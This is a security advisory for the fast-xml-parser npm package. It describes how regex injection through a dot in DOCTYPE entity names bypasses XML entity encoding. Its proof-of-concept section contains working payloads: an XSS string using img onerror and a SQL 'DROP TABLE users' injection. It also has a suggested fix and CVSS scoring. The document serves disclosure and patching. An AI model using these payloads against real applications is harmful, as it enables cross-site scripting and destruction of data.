fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names

Description

Entity encoding bypass via regex injection in DOCTYPE entity names

Summary

A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (<, >, &, ", ') with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.

Details

The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.

In DocTypeReader.js, entity names are passed directly to RegExp():

entities[entityName] = {
    regx: RegExp(`&${entityName};`, "g"),
    val: val
};

An entity named l. produces the regex /&l.;/g where . matches any character, including the t in <. Since DOCTYPE entities are replaced before built-in entities, this shadows < entirely.

The same issue exists in OrderedObjParser.js:81 (addExternalEntities), and in the v6 codebase - EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not included:

// v6 EntitiesParser.js line 96
const specialChar = "!?\\/[]$%{}^&*()<>|+";  // no dot

Shadowing all 5 built-in entities

Entity name Regex created Shadows
l. /&l.;/g <
g. /&g.;/g >
am. /&am.;/g &
quo. /&quo.;/g "
apo. /&apo.;/g '

PoC

const { XMLParser } = require("fast-xml-parser");

const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY l. "<img src=x onerror=alert(1)>">
]>
<root>
  <text>Hello <b>World</b></text>
</root>`;

const result = new XMLParser().parse(xml);
console.log(result.root.text);
// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>

No special parser options needed - processEntities: true is the default.

When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the injected <img onerror> fires.

& can be shadowed too:

const xml2 = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY am. "'; DROP TABLE users;--">
]>
<root>SELECT * FROM t WHERE name='O&Brien'</root>`;

const r = new XMLParser().parse(xml2);
console.log(r.root);
// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'

Impact

This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.

  • Default config, no special options
  • Attacker can replace any < / > / & / " / ' with arbitrary strings
  • Direct XSS vector when parsed XML content is rendered in a page
  • v5 and v6 both affected

Suggested fix

Escape regex metacharacters before constructing the replacement regex:

const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
entities[entityName] = {
    regx: RegExp(`&${escaped};`, "g"),
    val: val
};

For v6, add . to the blacklist in validateEntityName:

const specialChar = "!?\\/[].{}^&*()<>|+";

Severity

CWE-185 (Incorrect Regular Expression)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)

Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.

Basic information

Type
reviewed
Severity
critical
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-02-20 18:23:54 UTC
Updated
2026-02-27 16:51:59 UTC
GitHub reviewed
2026-02-20 18:23:54 UTC
NVD published
2026-02-20 21:19:27 UTC

EPSS Score

Score Percentile
0.02% 4.99%

CVSS Scores

Base score Version Severity Vector
9.3 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:C)
Breaking this can reach past the original component and bite other resources—bigger blast radius.
Confidentiality (C:L)
Some sensitive info could get out, but not a total data dump.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:N)
Service keeps running; no real outage angle.

Identifiers

CWEs

CWE id Name
CWE-185 Incorrect Regular Expression

Credits

  • Ochk0 (reporter)
  • yuezk (analyst)

Affected packages (2)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
npm fast-xml-parser >= 5.0.0, < 5.3.5 5.3.5
npm fast-xml-parser >= 4.1.3, < 4.5.4 4.5.4

References

cvelogic Threat Intelligence